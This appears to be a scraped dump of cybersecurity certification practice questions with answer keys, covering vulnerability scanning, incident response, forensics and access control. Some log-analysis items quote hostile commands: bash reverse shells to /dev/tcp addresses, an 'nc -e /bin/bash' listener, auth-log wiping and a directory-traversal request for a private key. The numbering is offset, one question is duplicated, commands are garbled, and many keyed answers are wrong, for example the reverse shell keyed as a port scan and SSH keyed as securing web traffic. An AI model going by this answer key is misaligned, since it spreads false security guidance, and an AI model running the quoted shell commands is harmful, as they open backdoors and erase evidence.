125. A business unit has an important web server that is running an outdated software platform that is vulnerable to some highly publicized attack vector. Which of the following technologies may be able to provide protection for the web application against coding attack scripts until the server is replaced?

a. Web application firewall
b. Web proxy
c. HIPS
d. Anti-malware

Answer 124

a. Web application firewall

Question 125

126. ** After a review of user account activity, it appears certain user accounts were being used to access critical systems that are unrelated to the user’s roles and responsibilities. The user accounts in question were disabled, but then other user accounts were used to perform the same activity soon after. Which of the following is the BEST remediation to stop this violation?

a. Reconfigure Radius
b. Implement MFA
c. Upgrade to the latest TLS
d. Salt password hashes

Answer 125

b. Implement MFA

Question 126

127. ** A vulnerability scan came back with critical findings for a Microsoft SharePoint server
     Vulnerable software installed: office 2007
     HIKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Installer
     /UserData/s-1-5-18/Products/000021096F0100000100000000F01FEC/InstallProperties – key exists. The office component Microsoft office Excel Services web Front End
     Components is running an affected version-12.0.6612.1000
     Which of the following actions should be taken?

a. Remove Microsoft Office from the server
b. Document the finding as an exception
c. Install a newer version of Microsoft Office on the server
d. Patch Microsoft office on the server

Answer 126

d. Patch Microsoft office on the server

Question 127

94. An analyst was investigating an attack that took place on the network. A user was able to access the system without proper authentication. Which of the following will the analyst recommend, related to management approaches, in order to control access? (Select THREE)

a. RBAC
b. LEAP
c. DAC
d. PEAP
e. MAC
f. SCAP
g. BCP

Answer 127

a. RBAC
c. DAC
e. MAC

Question 128

94. ** An analyst was investigating an attack that took place on the network. A user was able to access the system without proper authentication. Which of the following will the analyst recommend, related to management approaches, in order to control access? (Select THREE)
    a. RBAC
    b. LEAP
    c. DAC
    d. PEAP
    e. MAC
    f. SCAP
    g. BCP

Answer 128

a. RBAC
c. DAC
e. MAC

Question 129

128. A security analyst at a financial organization is implementing a vulnerability scanning program. Which of the following should be considered when creating the program? (Select TWO)

a. The endpoint security product should be set up to report on all scanning attempts
b. Regulatory requirements should be reviewed and built into the scanning methodology
c. Degradation of network functionality must be considered for scanning scheduling
d. Network access control should be set to allow vulnerability scanning traffic.
e. Difficulty of patching implementation should affect the outcome of the scanning result
f. Trend determination should dictate the scheduling and frequency of the scanning

Answer 129

b. Regulatory requirements should be reviewed and built into the scanning methodology
f. Trend determination should dictate the scheduling and frequency of the scanning

Question 130

129. A company has implemented WPA2, a 20-character minimum for the WIFI passphrase every 30 days, and has disabled SSID broadcast on all wireless access points. Which of the following is the company trying to mitigate?

a. Downgrade attacks
b. Rainbow tables
c. SSL pinning
d. Forced deauthentication

Answer 130

b. Rainbow tables

Question 131

130. ** A computer at a company was used to commit a crime. The system was seized and removed for further analysis. Which of the following is the purpose of labeling cables and connections when seizing the computer system?

a. To capture the system configuration as it was time it was removed
b. To maintain the chain of custody
c. To block any communication with the computer system from attack
d. To document the model, manufacturer, and type of cables connected

Answer 131

a. To capture the system configuration as it was time it was removed

Question 132

131. A penetration tester is preparing for an audit of critical systems that may impact the security of the environment. This includes the external perimeter and the internal perimeter of the environment. During which of the following processes is this type of information normally gathered?

a. Timing
b. Scoping
c. Authorization
d. Enumeration

Answer 132

b. Scoping

Question 133

132. A security analyst is assisting in the redesign of a network to make it secure. They should be low cost, and access to the secure segments should be easily monitored, secured, and controlled. Which of the following should be implemented?

a. System isolation
b. Honeypot
c. Jump box
d. Mandatory access control

Answer 133

c. Jump box

Question 134

133. A security architect is overseeing the implementation of a new human resources information system and must prevent sensitive data from being accessed by unauthorized users on the network. Which of the following security principles should be applied?

a. Enforce the principle of least privilege and disable privileged service accounts.
b. Isolate and interconnect subsystems in adherence with the principle of least privilege.
c. Use effective quality assurance techniques to divide and identify elevated access
d. Sanitize and separate data send to other systems with privileged accounts.

Answer 134

a. Enforce the principle of least privilege and disable privileged service accounts

Question 135

134. Which of the following systems or services is MOST likely to exhibit stemming from the heartbleed vulnerabilities? (Select TWO)

a. SSH daemons
b. Web servers
c. Modbus devices
d. TLS VPN services
e. IPSec VPN concentrators

Answer 135

b. Web servers

d. TLS VPN services

Question 136

135. A security analyst is in the process of remediating several high vulnerabilities identified in a recent assessment. The analyst is currently addressing issues identified on a critical database server, and just completed the upgrade of the database server to the latest security patch. After the application, the analyst re-ran the vulnerability scan. Although the majority of the database application’s high vulnerabilities were remediated, several high vulnerabilities persist. Which of the following describes the BEST course of action for the analyst?

a. Review the vulnerabilities to determine if any pertain to configuration weaknesses
b. Apply patches to address vulnerabilities to the underlying operating system
c. Accept the residual risk and move on to the next set of systems and vulnerabilities
d. Review the host firewall configuration to ensure access to the database port is denied

Answer 136

a. Review the vulnerabilities to determine if any pertain to configuration weaknesses

Question 137

136. A security analyst has discovered that an outbound SFTP process is occurring at the same time of day for the past several days. At the time this was discovered, large amounts of business-critical data were delivered. The authentication for this process occurred using a service account with proper credentials. The security analyst investigated the destination IP for this transfer and discovered that this new process is not documented in the change management log. Which of the following would be the BEST course of action for the analyst to take?

a. Investigate a potential incident
b. Verify user permission
c. Run a vulnerability scan
d. Verify SLA with cloud provider

Answer 137

a. Investigate a potential incident

Question 138

137. A user received an invalid password when trying to change the password. Which of the following policies could explain why the password is invalid?

a. Access control policy
b. Account management policy
c. Password policy
d. Data ownership

Answer 138

c. Password policy

Question 139

138. Which of the following BEST describes why vulnerabilities in ICS and SCADA can be difficult to remediate?

a. ICS/SCADA systems are not supported by the CVE publications
b. ICS/SCADA systems rarely have full security functionality
c. ICS/SCADA systems do not allow remote connections
d. ICS/SCADA systems use encrypted traffic to communicate between devices

Answer 139

b. ICS/SCADA systems rarely have full security functionality

Question 140

139. During the forensic phase of a security investigation, it was discovered that an attacker was able to find private keys on a poorly secured team shared drive. The attacker used those keys to intercept and decrypt sensitive traffic on a web server. Which of the following describes this type of exploit and the potential remediation?

a. Session hijacking; network intrusion detection sensors
b. Cross-site scripting; increased encryption key size
c. Man-in-the-middle; well-controlled storage of private keys
d. Rootkit; controlled storage of public keys

Answer 140

c. Man-in-the-middle; well-controlled storage of private keys

Question 141

140. ** A threat intelligence analyst who works for an oil and gas company has received the following email from a superior:
     “We will be connecting our IT network with our ICS in this scenario?”

a. Convergence decreases attack vectors.
b. Integration increases the attack surface
c. IT networks cannot be connected to ICS infrastructure
d. Combined networks decrease efficiency

Answer 141

b. Integration increases the attack surface

Question 142

141. Several accounting department users are reporting unusual Internet traffic in the browsing history of their workstations after returning to work and logging in. The building security team informs the IT security team that the cleaning staff was caught using the systems after the accounting department users left for the day. Which of the following steps should the IT security team take to help prevent this from happening again? (Select TWO)

a. Install a web monitor application to track Internet usage after hours
b. Configure a policy for workstation account timeout at three minutes
c. Configure NAC to set time-based restrictions on the accounting group to normal business hours
d. Configure mandatory access controls to allow only accounting department users to access the workstations
e. Set up a camera to monitor the workstations for unauthorized use

Answer 142

c. Configure NAC to set time-based restrictions on the accounting group to normal business hours
e. Set up a camera to monitor the workstations for unauthorized use

Question 143

142. A hacker issued a command and received the following response:
     PORT STATE SERVICE
     22/tcp open ssh
     80/tcp open http
     1543 filtered ?
     Device type: general purpose
     Os cpe: / o: linux_kernel: 2.5.6
     Read data files from /usr/local/bin/../share/nmap
     Which of the following describes what the hacker is attempting?

a. Penetrating the system
b. Performing a zombie scan
c. OS fingerprinting
d. Topology discovery

Answer 143

d. Topology discovery

Question 144

143. Joe, a network administrator, receives an alert indicating a recently discovered vulnerability in PAM. Joe must quickly determine if there are any systems on the network that would be vulnerable. Which of the following should Joe use?

a. Nmap
b. Snort
c. Netstat
d. Dig

Answer 144

a. Nmap

Question 145

144. Which of the following tools should a cybersecurity analyst use to verify the integrity of a forensic image before and after an investigation?

a. strings
b. shalsum
c. file
d. dd
e. gzip

Answer 145

b. shalsum

Question 146

145. A system analyst receives multiple alerts from the systems, reporting they cannot access the Internet. After tracking down the problem to the UTM IP address 120.136.1.1, the analyst notices the issues occurred with the latest threat feed, Which updated the UTM blocklist:

IPv4 Blocklist Feed
 	172.10.0.0/16
 	23.221.15.0/24
 	2.0.0.0/7
 	192.0.0.0/24
 	222.224.0.0/18
 	11.255.255.0/24
 	172.111.0.0/16
 	120.0.0.0/5
 	40.23.10.0/24
Reviewing the above blocklist, which of the following is the MOST likely reason for the unwanted behavior on the UTM?

a. The threat feed contained a mistyped subnet mask in the list, causing the UTM to block its own internal traffic processing
b. The network’s public IP was entered as part of the external threat feed, causing the UTM to block only external-bound traffic
c. The network’s private internal address range was included in the feed, blocking internal traffic from leaving the network
d. The threat feed contained the IANA range reserved for the experimental IP address, which the UTM was unable to process, causing inbound and outbound traffic stoppage

Answer 146

a. The threat feed contained a mistyped subnet mask in the list, causing the UTM to block its own internal traffic processing

Question 147

146. A security analyst is tasked with finding all external web hosts that are likely to be running plain text logon. The IP range is 109.120.0.33-62, and web servers are only listening on ports 80, 443, and 8080. Which of the following Nmap commands would return the desired result in the MOST concise way?

a. nmap-sS-Pn-p 80, 8080 109.120.0.32/27
b. nmap-sS-Pn-p 80, 443,8080 109.120.0.32/27
c. nmap-sS-Pn-p 80, 8080 109.120.0.1-254
d. nmap-sS-Pn-F 109.120.0.32/27

Answer 147

b. nmap-sS-Pn-p 80, 443,8080 109.120.0.32/27

Question 148

147. While reviewing SIEM logs, an analyst finds several unusual entries in the user’s command history records:
     bash-i >& /dev/ tcp/ 123.121.123.221/8080 0>&1
     bash-i >& /dev/ tcp/ 123.121.123.221/80 0>&1
     bash-i >& /dev/ tcp/ 123.121.123.221/25 0>&1
     bash-i >& /dev/ tcp/ 123.121.123.221/22 0>&1
     bash-i >& /dev/ tcp/ 123.121.123.221/443 0>&1
     Which of the following is most likely the FIRST objective of these commands?

a. Opening a reverse shell backdoor
b. Remote command execution on the targeted IP
c. SQL injection in the locally listening database
d. Manual port scan of IP addresses

Answer 148

d. Manual port scan of IP addresses

Question 149

148. A company just deployed a new content management system as its main corporate blog site. The site normally runs well and was configured to update automatically. However, updates keep failing to install with a permission error. After contacting the CMS vendor, the security analyst is assured the web server’s service account has to write permissions for the ‘update’ directory.
     Web service account
     User=www-data
     Group=www-data
     Drwxr-xr-x. www-data www-data system_u:object_r:httpd_sys_rw_content_t
     content
     Drwxr-xr-x. www-data root system_u:object_r:httpd_sys_rw_content_t themes
     Drwxr-xr-x. www-data root system_u:object_r:httpd_sys_rw_content_t update
     -rw-r–r–. www-data www-data system_u:object_r:httpd_sys_rw_content_t
     index.php
     -r- - - - - www-data root system_u:object_r:httpd_sys_rw_content_t
     config.php
     -rw-r–r–. www-data root system_u:object_r:httpd_sys_rw_content_t
     track.php
     -rw-r–r–. www-data www-data system_u:object_r:httpd_sys_rw_content_t
     post.php
     Given the result of the listing, which of the following should the security analyst do to BEST address the vendor’s instructions?

a. The analyst should give write permissions to the www-data group on the update directory
b. The analyst should give write permissions to the www-data user on the update directory
c. The analyst should change the ownership of all files and folders to the www-data group for the website
d. The analyst should enable write permissions on the MAC for the update directory

Answer 149

a. The analyst should give write permissions to the www-data group on the update directory

Question 150

150. A tool discovered a suspicious hash on one of the company’s servers, and the hash was reported by the SIEM. A review indicates the hashed file is part of the build of a new version of the SCAP scanner, which the company is required to use. Which of the following has MOST likely occurred?

a. The SCAP scanner purposely incorporates an offending hash, which by design triggered the alert in the SIEM
b. The SCAP scanner has been compromised, which triggered the alert in the SIEM
c. The SIEM is incompatible with the SCAP scanner, which triggered a false positive in the SIEM
d. The SIEM has not been updated to recognize the new hash, which triggered the alert in the SIEM

Answer 150

a. The SCAP scanner purposely incorporates an offending hash, which by design triggered the alert in the SIEM

Question 151

151. A security analyst is informed that employees from the resources department should not have access to the accounting department server, and the accounting department should not have access to the human resources department server. Which of the following technologies should be used?

a. IDS
b. VLAN
c. DMZ
d. NAT
e. VPN

Answer 151

b. VLAN

Question 152

152. A suite of three production servers that were originally configured identically underwent the same vulnerability scan. However, recent results revealed the three servers had different critical vulnerabilities. The servers are not accessible by the Internet, and AV programs have not detected any malware. The server’s Syslog files do not show any unusual traffic since they were installed and are physically isolated in an off-site datacenter Checksum testing of random executables does not reveal tampering. Which of the following scenarios is MOST likely?

a. Servers have not been scanned with the latest vulnerability signature
b. Servers have been attacked by outsiders using zero-day vulnerabilities
c. Servers were made by different manufacturers
d. Servers have received different levels of attention during previous patch management events

Answer 152

d. Servers have received different levels of attention during previous patch management events

Question 153

153. A large hospital is the recent target of a zero-day attack. The attack enabled payloads, which appear to be originating from multiple countries, to be dropped. The hospital’s information security department has deployed only endpoint antivirus software so far. The hospital wants to mitigate similar attacks in the future. Which of the following would be the best action to take NEXT?

a. Deploy perimeter firewalls to block the originating IP addresses of the recent attacks.
b. Integrate antivirus modules into all hospital routers with constant real-time updates.
c. Deploy FIPS compliant data-at-rest encryption to all hospital workstations and servers.
d. Deploy hash-based application whitelisting to all systems based on system baselines.

Answer 153

a. Deploy perimeter firewalls to block the originating IP addresses of the recent attacks.

Question 154

149. An employee reports that a company website is displaying the wrong description when using a search engine. Upon further review of the web browser, there is no evidence that something is wrong. The security administrator reviews the web server logs and finds the following:
     14:49:10 -0500} “GET index.htm. HTTP/1.0” 200 12 “-” “Mozilla/5.0 (windows NT 6.1;
     rv:12.0) Gecko/20130101 Firefox/10.0”
     14:50:09 -0500] “POST /wp-content/uploads/_input_test.php. HTTP/1.1” 200 58926 “-”
     “Opera/9.80 (windows NT6.0) Presto/2.12.388 Version/12.14”
     14:50:10-0500] “GET sales.htm. HTTP/1.1” 200 58926 “-” “Opera/9.80 (Windows NT 6.0)
     Presto/2.12.388 Version/12.14”
     14:50:12 -0500] “GET /wp-content/uploads/_input_test.php. HTTP/1.1” 200 12 “-”
     “Mozilla/5.0 (windows NT6.1; rv:12.0) Gecko/20130101 Firefox/10.0”
     14:52:10 -0500] “GET contactus.php. HTTP/1.1” 200 58926 “-” “Opera/9.80 (windows NT
     6.0) Presto/2.12.388 Version/12.14”
     14:53;17 -0500] “POST /wp-content/uploads/_input_test.php5 HTTP/1.0” 404 11259 “-”
     “-”
     Which of the following describes the incident?
     a. The website is incompatible between different versions of browsers
     b. The search engine bot pulled the incorrect file for the description of the website
     c. There are incorrect HTTP setting of the files to support the content management system
     d. An unauthorized file has been transferred successfully to the web server

Answer 154

c. There are incorrect HTTP setting of the files to support the content management system

Question 155

154. A system analyst is looking over a packet capture of a malware event in progress. Each request the malware maker is responded to by the malicious server, opening a new connection back to the infected workstation. Which of the following protocols is MOST likely being used?

a. HTTP
b. SSH
c. FTP
d. NFS

Answer 155

a. HTTP

Question 156

155. The following vulnerabilities were discovered in a company’s standard-issue mobile devices:
     Vulnerability A: An information disclosure vulnerability in kernel components could enable a local malicious application to access data outside of its permission levels after first compromising a privileged process.
     Vulnerability B: LibUtils mishandles conversions between Unicode character encodings widths, which allows remote attackers to execute arbitrary code or cause a denial of service via a crafted file.
     Vulnerability C: An elevation of privilege vulnerability in the framework APIs that execute after a user interacts with an attack mechanism could allow a local malicious application to record audio without the user’s knowledge.
     Vulnerability D : Server/content/SyncStorageEngine java mismanages certain authority data, which allows attackers to cause a Dos(reboot loop) via a crafted application downloaded by the user.
     Which of the following should be considered the MOST serious?

a. Vulnerability A
b. Vulnerability B
c. Vulnerability C
d. Vulnerability D

Answer 156

d. Vulnerability D

Question 157

156. A cybersecurity analyst detected that an attacker compromised a network and downloaded an executable. Through analyst, the analyst discovered the executable deleted all Linux server files and backups using the rm - rf command. Which of the following are the NEXT phases for handling this incident? (Select TWO)

a. Containment, eradication, and recovery
b. Detection and analysis
c. Eradication
d. Containment, recovery, and eradication
e. Post-incident
f. Post-analysis

Answer 157

a. Containment, eradication, and recovery

e. Post-incident

Question 158

157. Which of the following are reasons why a technician would use Aircrack-ng? (Select TWO)

a. To capture some initialization vormetric data
b. To monitor for rogue wireless access points
c. To find hidden wireless network names
d. To inject fake access point power levels
e. To ensure users connect to the correct access point

Answer 158

b. To monitor for rogue wireless access points

c. To find hidden wireless network names

Question 159

158. The company has decided to fund an enterprise content management system project. Management has decided it is time to move away from unstructured data residing on file servers. Staff members share information via attachments in emails and, in many cases, data has been sent to personal email addresses. Which of the following is the FIRST step to take in achieving a successful deployment of an enterprise content management system?
     a. Conduct data classification
     b. Establish structured data storage
     c. Utilize data loss prevention tools
     d. Implement an acceptable use policy

Answer 159

a. Conduct data classification

Question 160

159. An outside is coming up for a company, and the security analyst is looking for areas of improvement that can eliminate any findings the auditors may find, the analyst is reviewing the account login report:
     Account analysis report prepared on 03/17/2017:
     SamAccountName LastLogTimeStamp
     Administrator 2/10/2017 2:23:43 AM
     xsimpson 2/11/2017 3:42:00 AM
     djwilson 2/15/2017 5:25:35 AM
     dwalton 4/13/2016 2:45:412 AM
     mwagner 2/12/2017 11:11:34 AM
     Zirvin 8/04/2016 8:01:22 AM
     Which of the following would be the BEST recommendation for the security analyst to prevent any audit findings?

a. Implement automatic provisioning of accounts
b. Implement deletion for old accounts
c. Implement blocking of off-hour logins
d. Implement an acceptable use policy

Answer 160

c. Implement blocking of off-hour logins

Question 161

160. An organization has many deployed mobile devices in addition to its traditional workstations and servers attached to the corporate LAN. The security staff has a centralized vulnerability assessment tool that has been very effective for the traditional systems, but has an assessment results?

a. Configure the scanner to authenticate to and query the MDM using management APIs.
b. Ensure the scanning tools are loaded with the latest signatures for mobile malware
c. Require mobile devices to establish and maintain a full device VPN to the corporate network
d. Require mobile device users to download and install a personal vulnerability assessment app

Answer 161

a. Configure the scanner to authenticate to and query the MDM using management APIs.

Question 162

161. A cybersecurity analyst is sanitizing multiple 7200rpm hard drives before reassigning them to different users to prevent data leaks. Which of the following commands will accomplish this task?

a. dd if=/dev/zero of=/dev/sdX
b. rm-rf /home/X/*
c. shred /home/X/*
d. find /home/x-type f -exec truncate -so {}

Answer 162

a. dd if=/dev/zero of=/dev/sdX

Question 163

162. A software development company hired a programmer to develop a plug-in module for an existing application. After completing the module, the developer needs to test the entire application to ensure that the module did not introduce a new vulnerability. The developer thoroughly knows the module but has limited knowledge of the rest of the application. Which of the developer performing when testing the application?

a. Black box testing
b. Gray box testing
c. White box testing
d. Design review testing

Answer 163

b. Gray box testing

Question 164

163. A network security engineer is tasked with blocking all external connection attempts from the internet to the / admin directory in a web application that uses TLSv1.2, but must continue to allow access to the rest of the site. Which of the following controls should the engineer apply to fulfill the requirement?

a. Add an IPS signature to block any session requesting resources from / admin.
b. Add a rule in the /admin webserver directory to deny from all.
c. Add a disallow: /admin entry to the robots txt file in the webserver.
d. Add a firewall rule for Port 3 to allow connections from non RFC- 1918 addresses

Answer 164

a. Add an IPS signature to block any session requesting resources from / admin.

Question 165

164. Following a security configuration assessment on a legacy server, a configuration check failed as follows:
     Resh: enabled (CCE-6418-8)
     Which of the following BEST describes the risks associated with this configuration?

a. No access controls exist.
b. It is a cleartext protocol.
c. The service generates excessive broadcasts.
d. This exposes the / etc / shadow file.

Answer 165

b. It is a cleartext protocol.

Question 166

165. A cybersecurity analyst wants to check the Linux server at 10.10.10.11 after a hardening procedure was performed. The server is in a DMZ network isolated with a firewall from the Internet and the corporate network. Which of the following would be the MOST accurate way to know what services are listening on each port?

a. From a workstation, use nmap - p T:1-65535, U:1-65535 -sV 10.10.10.11
b. Use a sniffer at the Linux server at 10.10.10.11 to identify all communications.
c. Use the firewall logs and search for successful connections to and from Linux server.
d. Using elevated privileges, run the netstat -an | grep LISTEN command at the Linux server.

Answer 166

d. Using elevated privileges, run the netstat -an | grep LISTEN command at the Linux server.

Question 167

166. A computer system CPU utilization has increased, the system freezes up often, and critical files are deleted or modified. These are symptoms of:

a. a virus
b. a worm
c. ransomware
d. spyware

Answer 167

a. a virus

Question 168

167. A cybersecurity analyst is capturing an image of a machine that is possibly infected with malware. During which of the following incident response phases does this occur?
     a. Eradication
     b. Analysis
     c. Recovery
     d. Post-incident

Answer 168

b. Analysis

Question 169

168. Which of the following frameworks focuses exclusively on security architecture?

a. NIST
b. ISO
c. ITI
d. SABSA

Answer 169

d. SABSA

Question 170

169. Credential harvesting is taking place at a company where employees have been falling victim to phishing emails. Which of the following should a security analyst implement to prevent successful authentication from this type of attack?

a. Increased password complexity.
b. User behavioral analytics.
c. CAPTCHA input box.
d. Multifactor authentication

Answer 170

d. Multifactor authentication

Question 171

170. A vulnerability scan report shows a vulnerable version of Apache on a Linux server. The analyst validates the version by retrieving the server’s banner. The server’s administrator verifies that all available updates have been installed, but an attempt to exploit the vulnerability fails. Which of the following MOST likely occurred?

a. The vulnerability scanner is unable to properly establish a connection to the server.
b. The scanner agent was improperly installed.
c. The Apache server was patched before the scan was completed.
d. The package manager includes backported versions of Apache.

Answer 171

d. The package manager includes backported versions of Apache

Question 172

171. A company’s new vulnerability scanner produces many false positives, which require manual vulnerability testing every month. Most of the false positives are caused by the scanner’s inability to determine if a compensating control has been implemented at the OS or application level.

a. Increasing the scanner’s sensitivity level
b. Decreasing the time between vulnerability feed updates
c. Utilizing a SCAP tool
d. Implementing a credentialed scan

Answer 172

d. Implementing a credentialed scan

Question 173

172. A credentialed scan has discovered a potential information disclosure vulnerability on a web server. A security administrator reviews the following associated logs to determine the validity of the result:
     Web Server Logs
     192.168.1.10 - “ GET../../../../c:\Users\Administrator\Documents\Server.pfx HTTP/1.0 ” -
     200
     DLP Logs
     PERMIT 192.168.1.10 Server.pfx
     Which of the following should the administrator infer from the above information?

a. IIS needs to be patched for directory traversal.
b. The vulnerability is a false positive.
c. The DLP system provides adequate compensating control.
d. An exception must be configured in the vulnerability scanner.

Answer 173

d. An exception must be configured in the vulnerability scanner.

Question 174

173. The Chief Information Security Officer (CISO) wants to gather information on attacks happening in real-time against a network of smaller size and operation. Which of the following would MOST likely be implemented to achieve this objective?

a. Honeypot
b. Airgapped network
c. Dockers
d. Honeynet

Answer 174

d. Honeynet

Question 175

174. A security analyst needs to know which types of broadcast and multicast traffic are normally operating on the LAN where the analyst is concerned. The LAN is on network10.10.20.0/23, connected to eth0. Which of the following open-source tools and commands should the analyst use to find the information and establish a baseline?

a. nmap - script = broad* -e eth0
b. nmap -sV -sU -p 1-65535 10.10.21.255
c. ping 10.10.21.255
d. ping 10.10.20.255
e. nmap -sV -sU -p 1- 65565 10.10.20.0/23

Answer 175

a. nmap - script = broad* -e eth0

Question 176

175. When performing reverse engineering, which of the following file type would be MOST easily decompiled into source code?

a. .so
b. .exe
c. .jar
d. .a

Answer 176

c. .jar

Question 177

176. A new system was built recently using the SDLC process, and the validation process must ensure the system is behaving correctly. During the process, the development team notices the system is behaving as it should, except for a few bugs within an in-house application. Which of the following validation methods should be implemented to remediate this issue?

a. User validation
b. Code validation
c. Function validation
d. Recuming validation

Answer 177

c. Function validation

Question 178

177.	A security analyst is trying to determine the OS of an unidentified device on the network. A scan produces the following result:
PORT STATE SERVICE
135/tcp open rpc
139/tcp open Netbios-ssn
445/tcp open ds
3389/tcp open term-serv
4455/tcp open Upnotifyp
14000/tcp open Scotty-ft
Which of the following is MOST likely the unknown devices’ operating system?

a. Windows
b. Linux
c. Solaris
d. FreeBSD
e. MacOS

Answer 178

a. Windows

Question 179

178. A cybersecurity analyst is securing a server that will host an e-commerce web application. Which of the following actions will be required to prevent the financial data from being transferred in cleartext? (Select TWO).

a. Allow traffic to port 1433 and deny everything else.
b. Set up the webserver to use the NULL cipher suite.
c. Get a certificate from a reputable certificate authority.
d. Configure the webserver to use the latest SSH protocol.
e. Allow traffic to port 443 and deny everything else.

Answer 179

c. Get a certificate from a reputable certificate authority.

d. Configure the webserver to use the latest SSH protocol.

Question 180

179. A systems administrator is concerned that a server may be compromised. A security analyst notices the following log output while aiding with the investigation.
     July 23 01:35:10 LINSERV01 useradd[30245] : failed adding user ‘hjasole, data deleted
     July 23 01:35:10 LINSERV01 passwd[30246] : password for ‘hjasole’ changed by ‘root’
     July 23 01:35:12 LINSERV01 passwd[30263] : password for ‘mroch’ changed by ‘root’
     July 23 01:38:10 LINSERV01 useradd[30523] : failed adding user ‘apache’, data deleted
     July 23 01:42:48 LINSERV01 passwd[32532] : password for ‘sleeman’ changed by ‘root’
     July 23 01:47:07 LINSERV01 useradd[633] : failed adding user ‘mysql, data deleted
     Which of the following types of activities is the threat actor attempting?

a. Gain persistence
b. Password brute-forcing
c. Pivoting
d. Elevation of privilege

Answer 180

b. Password brute-forcing

Question 181

180. A Modbus/TCP Function Code Information Disclosure vulnerability is indicative of:

a. mobile phone
b. virtualization hosts.
c. VPN concentrators.
d. SCADA systems.

Answer 181

d. SCADA systems.

Question 182

181. While investigating an incident, a security analyst reviews the output of the history command on a Linux machine. The analyst receives the following output:
     cd/etc/
     Is-al
     Cat password
     Sudo nc 192.168.100.253-e/bin/bash
     cd/var/log/sudo echo “ “ > / var/log/auth.log
     Sudo useradd system-g wheel, sshuser-u 899
     touch-/ system
     Which of the following should the analyst conclude from the analysis of this output?

a. Persistence has been established on port 899.
b. A user who is not visible from the GUI has been added.
c. Log files in /var/log/ have been deleted.
d. A listener has been established on 192.168.100.253.

Answer 182

d. A listener has been established on 192.168.100.253.

Question 183

182. A security analyst is conducting a vulnerability assessment of older SCADA devices on the corporate network. Which of the following compensating controls is likely to prevent the scans from providing value?

a. Access control list network segmentation that prevents access to the SCADA devices inside the network
b. Detailed and tested firewall rules that effectively prevent outside access of the SCADA devices
c. Implementation of a VLAN that allows all devices on the network to see all SCADA devices on the network
d. SCADA systems configured with ‘SCADA SUPPORT’=ENABLE

Answer 183

a. Access control list network segmentation that prevents access to the SCADA devices inside the network

Question 184

183. New regulations have come out that require a company to conduct regular vulnerability scans. Not wanting to be found with a vulnerability during an audit, the company wants the most accurate and complete vulnerability scan. which of the following BEST meets this objective?

a. Regression scan
b. Port scan
c. SCAP scan
d. Agent-based scan

Answer 184

d. Agent-based scan

Question 185

184. A security analyst is capture network traffic in a web server that is suspected of using the DNS service for exfiltrating information out of the network. The server usually transfers serval gigabytes of data per day, and the analyst wants the size of the capture to be as reduced as possible. Which of the following commands should the analyst use to achieve such goals?

a. t cpdump tcp port 53 - i etho -w evidencel.pcap
b. t cpdump udp port 53 -i etho -w evidencel.pcap
c. t cpdump port 53 -i etho -w evidencel.pcap
d. t cpdump -i etho -w evidencel.pcap]

Answer 185

b. t cpdump udp port 53 -i etho -w evidencel.pcap

Question 186

185. A cyber-incident response team is responding to a network intrusion incident on a hospital network. Which of the following must the team prepare to allow the data to be used in court as evidence?

a. Computer forensics form
b. HIPAA response form
c. Chain of custody form
d. Incident form

Answer 186

c. Chain of custody form

Question 187

186. An analyst is reviewing data from a host that recently established a persistent TCP connection to a network over the internet. The connection was first established outbound around 2:53 p.m on July. The external IP is associated with a known C2 enclave. The analyst is now beginning to investigate how the code established an outbound connection, but logs are limited. The analyst is reviewing the following additional information. Antivirus log snippets:
     20180722 08:33:12 Info AV Client v1.4.2 started
     20180722 09:45:00 Info Definition updated to Rev. B000002293883; OK
     … . …
     20180722 14:33:11 Info Inspect new process Word.exe completed; OK.
     20180722 14:43:15 Info Inspect file C:\Users\Robin\Documents\weeklystatus. Doc
     completed; OK
     20180722 14:43:59 Info Inspact new process Outlook.exe completed; OK
     20180722 14:49:17 Info Inspact file C:\Users\Robin\Downloads\emailbackup.pst completed;
     OK
     20180722 14:52:19 Warn Inspect new process Outlook.exe failed; cannot read
     20180722 14:55:46 Info Inspect new process Outlook.exe completed; OK
     … … …
     Event logs (application):
     … …
     07222018 143311 EDT Word.exe started
     07222018 144302 EDT Word.exe write to
     C:\Users\Robin\Documents\Weeklystatus.doc
     07222018 144359 EDT Outlook.exe started
     07222018 144917 EDT Outlook.exe write to
     C:\Users\Robin\Downloads\emailbackup.pst
     07222018 145219 EDT Outlook.exe fatal error BES unknown 0000000 var
     15.1.3221.1000
     07222018 145219 EDT Outlook.exe closed unexpectedly, non-recoverable
     07222018 145546 EDT Outlook.exe Started
     Based on the limited available information, which of the following MOST likely occurred?

a. The user downloaded the malicious C2 application and saved it to the PST file, which caused code execution.
b. Word.exe was vulnerable to command execution, and the C2 application written to weeklystatus.doc and then executed
c. The user clicked a spear-phishing link in an email, which exploited an unsecured OS function call vulnerability in the web browser.
d. A vulnerable Outlook.exe opened an email that exploited a buffer overrun vulnerability, providing arbitrary code execution.

Answer 187

d. A vulnerable Outlook.exe opened an email that exploited a buffer overrun vulnerability, providing arbitrary code execution.

Question 188

187. An analyst performed the following activities:
     1 Review the security logs.
     2 Install a surveillance camera.
     3 Analyze trend reports.
     Which of the following job responsibilities is the analyst performing? (Select TWO)

a. Detect a security incident
b. Reduce the attack surface of the system.
c. Implement monitoring controls.
d. Harden network devices.
e. Prevent unauthorized access.
f. Encrypt the devices.

Answer 188

b. Reduce the attack surface of the system.

c. Implement monitoring controls.

Question 189

188. A security analyst is performing a manual penetration test on the company’s web server. A format agreement from the Chief Information Officer (CIO) documents that an eight-hour window over the weekend is allowable to perform the testing. Shortly after starting the test, the analyst discovers a critical vulnerability that would allow unauthorized remote guests to access internal company resources. Which of the following should the analyst do after discovering this vulnerability?

a. Stop the testing and report the vulnerability to the CIO for guidance.
b. Continue the penetration test to complete it within the right-hour time frame.
c. Pause the test to make the necessary changes to resolve the issue.
d. Long a ticket detailing the vulnerability and continue to test.

Answer 189

b. Continue the penetration test to complete it within the right-hour time frame.

Question 190

189. A company has a large number of users who need to access corporate resources or networks from various locations. Many users have VPN access to the network, as well as wireless internet access from BYOD approved systems, tablets, and smartphones. The users can also access corporate resources from an Internet-facing web portal; however, all of these services require a separate set of credentials. Which of the following should the cybersecurity analyst recommend aggregating and audit all logins while allowing corporate directory services credentials to be shared across all of the services?

a. SAML
b. Kerberos
c. SSO
d. RADIUS

Answer 190

c. SSO

Question 191

190. A security analyst is investigating some unusual network traffic to and from one of the company’s email servers. Reviewing a packet capture, the analyst notes the following sequence of packets:
     67.35.20.70 740125.131.27 TCP 61234 -> smtp (25) (SYN) Seq=0 Win=29200 Len=0
